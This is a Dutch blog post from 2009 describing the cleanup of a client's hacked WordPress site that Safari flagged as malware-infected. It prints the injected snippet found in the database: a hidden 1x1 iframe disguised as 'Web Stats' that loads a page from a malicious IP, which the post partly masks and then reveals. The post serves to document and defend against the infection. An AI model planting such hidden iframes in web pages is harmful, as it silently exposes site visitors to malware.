Skip to content

WordPress Hacked!

Malware op WordPress Blog!

Op een WordPress site van een client van ons is kwaadaardige code of malware geinjecteerd. Safari geeft een waarschuwing bij een bezoek aan de website dat er sprake is van een met malware besmette website en dat Google Safebrowsing bezocht kan worden voor meer informatie

Safari malware detectie

Safari gaf die melding omdat kwaadaardige code verwees naar een site die gehackt is door een spammer of spam uitdeelt.  Firefox en Internet Explorer geven die waarschuwing niet en Safari ook niet na mijn laatste schoonmaak. Safari is erg scherp op dat gebied zo zie je maar want het vond dit stukje code toch maar weer nadat ik al behoorlijk had opgeruimd.

Google Safebrowsing

Google heeft ook niets te melden op http://www.google.com/safebrowsing/diagnostic?site=http://www.hetdomein.com
aangezien de website geen spam host, maar wel nog html had die ernaar verwees. Gelukkig wordt de site daarmee niet door Google op de zwarte lijst gezet.

Kwaadaardige code in kwestie

Dit is de code die ik veel terugvond in de database:

<!-- Web Stats -->
<iframe src=<a class="moz-txt-link-freetext" href="http://xx.222.134.170/stats.php?id=2">http://xx.222.134.170/stats.php?id=2</a> width=1 height=1 frameborder=0></iframe>
<!-- End Web Stats -->

De 2 x-en in het ip adres zijn een 7 en een 4. Deze zijn aangepast om zelf geen doorgeefluik te worden en geblacklisted te worden door Safari.
NB Verder vond ik ook casino links, maar of die twee gelieerd zijn weet ik nog niet zeker.

Na de grote schoonmaak in de database heb ik de site in kwestie nogmaals via Google Safebrowsing en unmaskparasites.com
gecontroleerd en niets kunnen vinden.

Heuristic virus

Na onderzoek online lijkt om een heuristic virus te gaan:

http://forum.avast.com/index.php?topic=44842.0 is een discussie hierover
https://safeweb.norton.com/report/show?name=74.222.134.170 meldt dat dit een virus is: Packed.Generic.56
http://www.symantec.com/security_response/writeup.jsp?docid=2008-052016-3523-99 meldt dat het virus niet ver verspreid is en weinig schade aanricht: Risk Level Very Low

Als ik erop Google zie ik het echter op veel websites vermeld staan. Zelfs zichtbaar vermeld staan in op de website. Ik zag dat er veel WordPress sites bij zaten. Hoe de code verspreid wordt is nog niet duidelijk.

Als iemand meer weet hoor ik het graag!!

Gepubliceerd door Doede op woensdag 3 juni 2009

Van → Home, Wordpress

Laat een reactie achter

NB: XHTML is toegstaan. Je email adres wordt niet gepubliceerd.

Abonneer je op de reacties op dit artikel via RSS

*